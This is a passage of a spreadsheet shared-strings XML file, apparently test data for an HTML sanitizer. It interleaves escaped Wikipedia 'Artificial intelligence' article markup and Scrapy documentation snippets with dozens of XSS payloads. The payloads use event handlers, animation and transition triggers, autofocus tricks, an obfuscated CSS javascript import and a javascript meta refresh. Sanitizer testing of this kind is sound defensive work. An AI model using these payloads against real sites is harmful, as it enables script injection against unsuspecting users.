    <t>&lt;figure onmouseup="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;basefont oncopy="alert(1)" contenteditable&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;bdi draggable="true" ondrag="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Memory</t>
  </si>
  <si>
    <t>&lt;div role="navigation" aria-labelledby="sister-projects" class="metadata plainlinks sistersitebox plainlist mbox-small" style="border:1px solid #aaa; padding:0; background:#f9f9f9;"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;mark style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;hr id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/hr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Center_for_Applied_Rationality" title="Center for Applied Rationality"&gt;Center for Applied Rationality &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;~46–52 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;hr onbeforecopy="alert(1)" contenteditable&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Applications_of_artificial_intelligence" title="Applications of artificial intelligence"&gt;Applications of artificial intelligence &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">              &lt;/div&gt;          </t>
  </si>
  <si>
    <t>&lt;area onclick="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Artificial Intelligence has inspired numerous creative applications including its usage to produce visual art. The exhibition "Thinking Machines: Art and Design in the Computer Age, 1959–1989" at MoMA&lt;sup id="cite_ref-moma_343-0" class="reference"&gt;&lt;a href="#cite_note-moma-343"&gt;&amp;#91;332&amp;#93; &lt;/a&gt; &lt;/sup&gt; provides a good overview of the historical applications of AI for art, architecture, and design. Recent exhibitions showcasing the usage of AI to produce art include the Google-sponsored benefit and auction at the Gray Area Foundation in San Francisco, where artists experimented with the &lt;a href="/wiki/DeepDream" title="DeepDream"&gt;DeepDream &lt;/a&gt; algorithm&lt;sup id="cite_ref-wp1_344-0" class="reference"&gt;&lt;a href="#cite_note-wp1-344"&gt;&amp;#91;333&amp;#93; &lt;/a&gt; &lt;/sup&gt; and the exhibition "Unhuman: Art in the Age of AI," which took place in Los Angeles and Frankfurt in the fall of 2017.&lt;sup id="cite_ref-sf_345-0" class="reference"&gt;&lt;a href="#cite_note-sf-345"&gt;&amp;#91;334&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-artsy_346-0" class="reference"&gt;&lt;a href="#cite_note-artsy-346"&gt;&amp;#91;335&amp;#93; &lt;/a&gt; &lt;/sup&gt; In the spring of 2018, the Association of Computing Machinery dedicated a special magazine issue to the subject of computers and art highlighting the role of machine learning in the arts.&lt;sup id="cite_ref-acm_347-0" class="reference"&gt;&lt;a href="#cite_note-acm-347"&gt;&amp;#91;336&amp;#93; &lt;/a&gt; &lt;/sup&gt; The Austrian &lt;a href="/wiki/Ars_Electronica" title="Ars Electronica"&gt;Ars Electronica &lt;/a&gt; and &lt;a href="/wiki/Museum_of_Applied_Arts,_Vienna" title="Museum of Applied Arts, Vienna"&gt;Museum of Applied Arts, Vienna &lt;/a&gt; opened exhibitions on AI in 2019.&lt;sup id="cite_ref-Ars_Electronica_Exhibition_&amp;#39;&amp;#39;Understanding_AI&amp;#39;&amp;#39;_348-0" class="reference"&gt;&lt;a href="#cite_note-Ars_Electronica_Exhibition_&amp;#39;&amp;#39;Understanding_AI&amp;#39;&amp;#39;-348"&gt;&amp;#91;337&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Museum_of_Applied_Arts_Exhibition_&amp;#39;&amp;#39;Uncanny_Values&amp;#39;&amp;#39;_349-0" class="reference"&gt;&lt;a href="#cite_note-Museum_of_Applied_Arts_Exhibition_&amp;#39;&amp;#39;Uncanny_Values&amp;#39;&amp;#39;-349"&gt;&amp;#91;338&amp;#93; &lt;/a&gt; &lt;/sup&gt; The Ars Electronica's 2019 festival "Out of the box" extensively thematized the role of arts for a sustainable societal transformation with AI.&lt;sup id="cite_ref-European_Platform_for_Digital_Humanism_350-0" class="reference"&gt;&lt;a href="#cite_note-European_Platform_for_Digital_Humanism-350"&gt;&amp;#91;339&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;font onkeyup="alert(1)" contenteditable&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;meter onpointerdown=alert(1)&gt;XSS&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;del style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Robotic_arm" title="Robotic arm"&gt;arm &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;figcaption style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Gaussian_mixture_model-226"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Gaussian_mixture_model_226-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;menuitem draggable="true" ondrag="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;dd&gt;"Every aspect of learning or any other feature of intelligence can be so precisely described that a machine can be made to simulate it." This conjecture was printed in the proposal for the Dartmouth Conference of 1956.&lt;sup id="cite_ref-Dartmouth_proposal_352-0" class="reference"&gt;&lt;a href="#cite_note-Dartmouth_proposal-352"&gt;&amp;#91;341&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;section style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Evolutionary_computation" style="padding:3px"&gt;&lt;table class="nowraplinks mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;q onblur=alert(1) tabindex=1 id=x&gt;&lt;/q&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;label onmouseup="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;298–305 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Charles_Fran%C3%A7ois_(systems_scientist)" title="Charles François (systems scientist)"&gt;Charles François &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;font id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/font&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;del onmouseover="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onpointerenter=alert(1)&gt;XSS&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Scrapy is a fast high-level &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Web_crawler"&gt;web crawling&lt;/a&gt; and &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Web_scraping"&gt;web scraping&lt;/a&gt; framework, used</t>
  </si>
  <si>
    <t>&lt;p onkeyup="alert(1)" contenteditable&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;caption onmouseenter="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;91–104 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;form draggable="true" ondragenter="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;applet onmouseenter="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEMarkoff2011-45"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEMarkoff2011_45-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;In the late 1990s and early 21st century, AI began to be used for logistics, &lt;a href="/wiki/Data_mining" title="Data mining"&gt;data mining &lt;/a&gt;, &lt;a href="/wiki/Medical_diagnosis" title="Medical diagnosis"&gt;medical diagnosis &lt;/a&gt; and other areas.&lt;sup id="cite_ref-AI_widely_used_25-1" class="reference"&gt;&lt;a href="#cite_note-AI_widely_used-25"&gt;&amp;#91;25&amp;#93; &lt;/a&gt; &lt;/sup&gt; The success was due to increasing computational power (see &lt;a href="/wiki/Moore%27s_law" title="Moore&amp;#39;s law"&gt;Moore's law &lt;/a&gt; and &lt;a href="/wiki/Transistor_count" title="Transistor count"&gt;transistor count &lt;/a&gt;), greater emphasis on solving specific problems, new ties between AI and other fields (such as &lt;a href="/wiki/Statistics" title="Statistics"&gt;statistics &lt;/a&gt;, &lt;a href="/wiki/Economics" title="Economics"&gt;economics &lt;/a&gt; and &lt;a href="/wiki/Mathematical_optimization" title="Mathematical optimization"&gt;mathematics &lt;/a&gt;), and a commitment by researchers to mathematical methods and scientific standards.&lt;sup id="cite_ref-Formal_methods_in_AI_43-0" class="reference"&gt;&lt;a href="#cite_note-Formal_methods_in_AI-43"&gt;&amp;#91;43&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/IBM_Deep_Blue" class="mw-redirect" title="IBM Deep Blue"&gt;Deep Blue &lt;/a&gt; became the first computer chess-playing system to beat a reigning world chess champion, &lt;a href="/wiki/Garry_Kasparov" title="Garry Kasparov"&gt;Garry Kasparov &lt;/a&gt;, on 11 May 1997.&lt;sup id="cite_ref-FOOTNOTEMcCorduck2004480–483_44-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEMcCorduck2004480–483-44"&gt;&amp;#91;44&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;param onpointerout=alert(1)&gt;XSS&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;abbr id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Causality#Causal_calculus" title="Causality"&gt;Causal calculus &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Basics"&gt;Basics </t>
  </si>
  <si>
    <t>&lt;map onpointerenter=alert(1)&gt;XSS&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onbeforecopy="alert(1)" contenteditable&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert("")';&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;meter ondblclick="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;discard onpointerover=alert(1)&gt;XSS&lt;/discard&gt;</t>
  </si>
  <si>
    <t>&lt;input2 onpointerover=alert(1)&gt;XSS&lt;/input2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Computational intelligence and soft computing </t>
  </si>
  <si>
    <t>&lt;xmp onkeydown="alert(1)" contenteditable&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;strong onpointerenter=alert(1)&gt;XSS&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Intertheoretic_reduction" title="Intertheoretic reduction"&gt;Intertheoretic reduction &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;caption onpointerup=alert(1)&gt;XSS&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;link onmouseup="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;q onpointerenter=alert(1)&gt;XSS&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;meta http-equiv="refresh" content="0;url=javascript:confirm(1)"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Artsy&amp;amp;rft.atitle=It%27s+Getting+Hard+to+Tell+If+a+Painting+Was+Made+by+a+Computer+or+a+Human&amp;amp;rft.date=2017-09-21&amp;amp;rft.aulast=Chun&amp;amp;rft.aufirst=Rene&amp;amp;rft_id=https%3A%2F%2Fwww.artsy.net%2Farticle%2Fartsy-editorial-hard-painting-made-computer-human&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>Breadth of commonsense knowledge:</t>
  </si>
  <si>
    <t>&lt;p&gt;Physicist &lt;a href="/wiki/Stephen_Hawking" title="Stephen Hawking"&gt;Stephen Hawking &lt;/a&gt;, &lt;a href="/wiki/Microsoft" title="Microsoft"&gt;Microsoft &lt;/a&gt; founder &lt;a href="/wiki/Bill_Gates" title="Bill Gates"&gt;Bill Gates &lt;/a&gt;, and &lt;a href="/wiki/SpaceX" title="SpaceX"&gt;SpaceX &lt;/a&gt; founder &lt;a href="/wiki/Elon_Musk" title="Elon Musk"&gt;Elon Musk &lt;/a&gt; have expressed concerns about the possibility that AI could evolve to the point that humans could not control it, with Hawking theorizing that this could "&lt;a href="/wiki/Global_catastrophic_risk" title="Global catastrophic risk"&gt;spell the end of the human race &lt;/a&gt;".&lt;sup id="cite_ref-364" class="reference"&gt;&lt;a href="#cite_note-364"&gt;&amp;#91;353&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Holley_365-0" class="reference"&gt;&lt;a href="#cite_note-Holley-365"&gt;&amp;#91;354&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-366" class="reference"&gt;&lt;a href="#cite_note-366"&gt;&amp;#91;355&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Edward_Fredkin" title="Edward Fredkin"&gt;Edward Fredkin &lt;/a&gt; is quoted in &lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck (2004 &lt;/a&gt;, p.&amp;#160;401). &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;rtc id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;noscript draggable="true" ondragenter="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onkeyup="alert(1)" contenteditable&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;a href="/wiki/Cybersecurity" class="mw-redirect" title="Cybersecurity"&gt;cybersecurity &lt;/a&gt; arena faces significant challenges in the form of larges scale hacking attacks of different types which harm organizations of all kinds and create billions of dollars in business damage. Artificial intelligence and Natural Language Processing (NLP) has begun to be used by security companies - for example SIEM (Security Information and Event Management) solutions.  The more advanced of these solutions use AI and NLP to automatically sort the data in networks into high risk and low risk information.  This enables security teams to focus on the attacks that have the potential to do real harm to the organization, and not become victims of attacks such as &lt;a href="/wiki/Denial-of-service_attack" title="Denial-of-service attack"&gt;Denial of Service (DoS) &lt;/a&gt;, &lt;a href="/wiki/Malware" title="Malware"&gt;Malware &lt;/a&gt; and others.</t>
  </si>
  <si>
    <t>&lt;isindex onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/isindex&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;center onpointerout=alert(1)&gt;XSS&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;small onmouseenter="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ernst_von_Glasersfeld" title="Ernst von Glasersfeld"&gt;Ernst von Glasersfeld &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;code onbeforecopy="alert(1)" contenteditable&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-23"&gt;&lt;a href="#Computational_intelligence_and_soft_computing"&gt;&lt;span class="tocnumber"&gt;5.3.2 </t>
  </si>
  <si>
    <t xml:space="preserve">       &lt;div class="rst-content"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Financial+Times&amp;amp;rft.atitle=AI+learns+to+read+Korean%2C+so+you+don%27t+have+to&amp;amp;rft.date=2019-05-02&amp;amp;rft.aulast=Croft&amp;amp;rft.aufirst=Jane&amp;amp;rft_id=https%3A%2F%2Fwww.ft.com%2Fcontent%2Ffef40df0-4a6a-11e9-bde6-79eaea5acb64&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;plaintext onpointerleave=alert(1)&gt;XSS&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;sup onpointerup=alert(1)&gt;XSS&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;pre id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Problem_of_induction" title="Problem of induction"&gt;Problem of induction &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noembed draggable="true" ondragenter="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;image onmouseenter="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;big id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onmouseleave="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;html id=x tabindex=1 onactivate=alert(1)&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;q onmouseup="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="intro/install.html"&gt;&lt;span class="doc"&gt;Installation guide</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;legend ondrop=alert(1) contenteditable&gt;drop here&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onpointerdown=alert(1)&gt;XSS&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-47"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-47"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;rb onpointerover=alert(1)&gt;XSS&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;ol ondblclick="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem id=x tabindex=1 onfocus=alert(1)&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;&lt;a href="/wiki/Multi-agent_planning" title="Multi-agent planning"&gt;Multi-agent planning &lt;/a&gt; uses the &lt;a href="/wiki/Cooperation" title="Cooperation"&gt;cooperation &lt;/a&gt; and competition of many agents to achieve a given goal. &lt;a href="/wiki/Emergent_behavior" class="mw-redirect" title="Emergent behavior"&gt;Emergent behavior &lt;/a&gt; such as this is used by &lt;a href="/wiki/Evolutionary_algorithms" class="mw-redirect" title="Evolutionary algorithms"&gt;evolutionary algorithms &lt;/a&gt; and &lt;a href="/wiki/Swarm_intelligence" title="Swarm intelligence"&gt;swarm intelligence &lt;/a&gt;.&lt;sup id="cite_ref-Multi-agent_planning_114-0" class="reference"&gt;&lt;a href="#cite_note-Multi-agent_planning-114"&gt;&amp;#91;111&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;isindex draggable="true" ondragend="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;s id=x tabindex=1 onfocus=alert(1)&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;nav id=x tabindex=1 onfocus=alert(1)&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onpointerdown=alert(1)&gt;XSS&lt;/multicol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_at_Edinburgh_and_France_in_the_60s-162"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-AI_at_Edinburgh_and_France_in_the_60s_162-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-235"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-235"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Structuralism_(philosophy_of_science)" title="Structuralism (philosophy of science)"&gt;Structuralism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/h3&gt;</t>
  </si>
  <si>
    <t>&lt;textarea id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/textarea&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;del onmouseenter="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;strike onload=alert(1)&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Bayesian_network" title="Bayesian network"&gt;Bayesian network &lt;/a&gt;, &lt;a href="/wiki/Hidden_Markov_model" title="Hidden Markov model"&gt;Hidden Markov model &lt;/a&gt;, &lt;a href="/wiki/Kalman_filter" title="Kalman filter"&gt;Kalman filter &lt;/a&gt;, &lt;a href="/wiki/Particle_filter" title="Particle filter"&gt;Particle filter &lt;/a&gt;, &lt;a href="/wiki/Decision_theory" title="Decision theory"&gt;Decision theory &lt;/a&gt;, and &lt;a href="/wiki/Utility_theory" class="mw-redirect" title="Utility theory"&gt;Utility theory &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem draggable="true" ondragstart="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;button onkeypress="alert(1)" contenteditable&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=WIRED&amp;amp;rft.atitle=AI+Has+a+Hallucination+Problem+That%27s+Proving+Tough+to+Fix&amp;amp;rft.date=2018&amp;amp;rft_id=https%3A%2F%2Fwww.wired.com%2Fstory%2Fai-has-a-hallucination-problem-thats-proving-tough-to-fix%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;acronym onmouseleave="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt;&amp;#32;&lt;span class="metadata"&gt; &amp;#8211; &lt;a href="/wiki/Talk:Artificial_intelligence#Dubious" title="Talk:Artificial intelligence"&gt;discuss &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-3"&gt;&lt;a href="#Basics"&gt;&lt;span class="tocnumber"&gt;3 </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;em id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Fact" title="Fact"&gt;Fact &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;thead oncontextmenu="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;cite onkeydown="alert(1)" contenteditable&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;head oncopy="alert(1)" contenteditable&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;sub draggable="true" ondragenter="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;big onmouseover="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;center onbeforecut="alert(1)" contenteditable&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;There is no established unifying theory or &lt;a href="/wiki/Paradigm" title="Paradigm"&gt;paradigm &lt;/a&gt; that guides AI research. Researchers disagree about many issues.&lt;sup id="cite_ref-155" class="reference"&gt;&lt;a href="#cite_note-155"&gt;&amp;#91;152&amp;#93; &lt;/a&gt; &lt;/sup&gt; A few of the most long standing questions that have remained unanswered are these: should artificial intelligence simulate natural intelligence by studying &lt;a href="/wiki/Psychology" title="Psychology"&gt;psychology &lt;/a&gt; or &lt;a href="/wiki/Neuroscience" title="Neuroscience"&gt;neurobiology &lt;/a&gt;? Or is &lt;a href="/wiki/Human_biology" title="Human biology"&gt;human biology &lt;/a&gt; as irrelevant to AI research as bird biology is to &lt;a href="/wiki/Aeronautical_engineering" class="mw-redirect" title="Aeronautical engineering"&gt;aeronautical engineering &lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Schmidhuber, J. (1992). "Learning complex, extended sequences using the principle of history compression". &lt;i&gt;Neural Computation &lt;/i&gt;. &lt;b&gt;4 &lt;/b&gt; (2): 234–242. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.49.3934"&gt;10.1.1.49.3934 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;details id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;For financial statements audit, AI makes continuous audit possible. AI tools could analyze many sets of different information immediately. The potential benefit would be the overall audit risk will be reduced, the level of assurance will be increased and the time duration of audit will be reduced.&lt;sup id="cite_ref-339" class="reference"&gt;&lt;a href="#cite_note-339"&gt;&amp;#91;328&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;img style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;content onmouseup="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=56" title="Edit section: Ethical machines"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
